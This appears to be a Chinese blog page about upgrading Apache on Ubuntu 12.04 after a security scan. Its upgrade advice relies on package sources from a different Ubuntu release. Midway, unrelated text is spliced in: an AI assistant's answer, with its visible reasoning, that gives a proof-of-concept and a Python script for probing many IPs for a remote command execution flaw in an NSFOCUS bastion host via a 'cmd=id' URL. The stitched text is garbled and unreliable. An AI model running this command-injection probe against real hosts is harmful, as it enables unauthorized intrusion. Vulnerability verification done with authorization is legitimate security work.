绿盟扫描出来的ubuntu12.04下apache漏洞修复

本文记录了在Ubuntu 12.04系统上修复由绿盟扫描发现的Apache漏洞的过程。由于外部端口被封,作者通过更新Apache源并执行`sudo apt-get install apache2`成功升级到新版本,解决了安全问题。在此过程中,需要注意更新正确的Ubuntu源,并在升级过程中确认所有提示。

前段时间修复了一个老服务器,ubuntu12.04的系统,原来的apache是2.2.22版本的,绿盟扫描出来了N多的漏洞,因为这个学校把所有的外部端口都封死了。

没办法,开搞。

网上搜了很多资料,先是apt-get命令升级,直接就失败。

然后尝试把ubuntu版本的apache卸掉,重新安装linux版的。

结果卸载不掉,直接rm-rf删除/etc/apache文件夹后,用apache2 -v命令查看还是旧版本。

那就把服务停掉,打开linux版本的,结果不能挂载网站,也不知道哪里出错了。

最后成功的经验如下:

为了安全起见,最好备份下/var/www目录下的东西。

其实很简单,直接执行

sudo apt-get install apache2

这一步会提示不成功或者出错,实际上是源除了问题,具体怎么更新源,就不再细说了,最终是用下面这个源成功的:

deb http://archive.ubuntu.com/ubuntu/ trusty main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu/ trusty-security main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu/ trusty-updates main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu/ trusty-proposed main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse

deb-src http://archive.ubuntu.com/ubuntu/ trusty main

<think>好的,我需要帮用户解决关于绿盟产品批量验证的使用方法和教程的问题。首先,我得查看用户提供的引用内容,特别是引用[3],里面提到了绿盟SAS堡垒机的远程命令执行漏洞和批量验证POC的使用方法。用户可能想知道如何利用绿盟的工具或产品进行类似的批量验证操作。 首先,我需要确认绿盟是否有官方的批量验证工具或功能。根据引用[3],用户可能已经有一个POC脚本,但需要指导如何使用。通常,批量验证可能涉及编写脚本来自动化测试多个目标,比如使用Python或者其他自动化工具。 接下来,我需要考虑绿盟产品的具体文档或指南。用户可能需要参考绿盟的官方文档,或者寻找社区提供的教程。引用[3]中的POC示例使用了Tscan验证工具,这可能是一个自定义脚本或工具。用户可能需要了解如何配置参数、路径、请求头等。 另外,用户可能需要了解绿盟SAS堡垒机的配置步骤,比如如何设置Exec路径和处理响应。例如,在引用[3]的POC中,路径是/webconf/Exec/index?cmd=id,请求方法为GET,并且检查响应状态和内容。用户需要确保他们的脚本能够正确发送请求并解析结果。 同时,安全测试需要权限,用户必须确保他们有权对目标系统进行测试,避免未经授权的访问。此外,绿盟可能提供了一些安全工具或API,用户需要查阅相关文档来集成批量验证功能。 最后,我应该建议用户参考绿盟的官方支持或社区论坛,以获取最新的工具和教程。如果有具体的产品名称,如绿盟SAS堡垒机,应指导用户查找该产品的用户手册或安全指南中的批量验证部分。</think>关于绿盟产品批量验证的使用方法,根据提供的漏洞验证案例[^3],以下是分步骤说明: 1. **准备工作环境** - 安装Python环境(建议3.6+版本) - 配置Tscan等漏洞验证工具 - 准备目标IP列表文件(如`targets.txt`) 2. **解析POC验证模板**(以绿盟SAS堡垒机漏洞为例) ```yaml rules: method: GET path: /webconf/Exec/index?cmd=id # 关键漏洞触发路径 headers: Content-Type: application/x-www-form-urlencoded expression: response.status == 200 && response.body.contains("WEBSVC OK") # 漏洞特征判断 ``` 3. **构建批量验证脚本框架** ```python import requests def check_vuln(ip): try: url = f"http://{ip}/webconf/Exec/index?cmd=id" response = requests.get(url, timeout=5) if response.status_code == 200 and "WEBSVC OK" in response.text: return True except Exception as e: return False return False ``` 4. **实施批量验证** - 遍历IP列表文件 - 多线程加速检测(建议控制并发量) - 输出存在漏洞的目标列表 **注意事项**: - 必须获得合法授权后才可进行验证[^3] - 绿盟产品存在防护机制,高频请求可能触发封禁 - 验证前建议在隔离环境测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值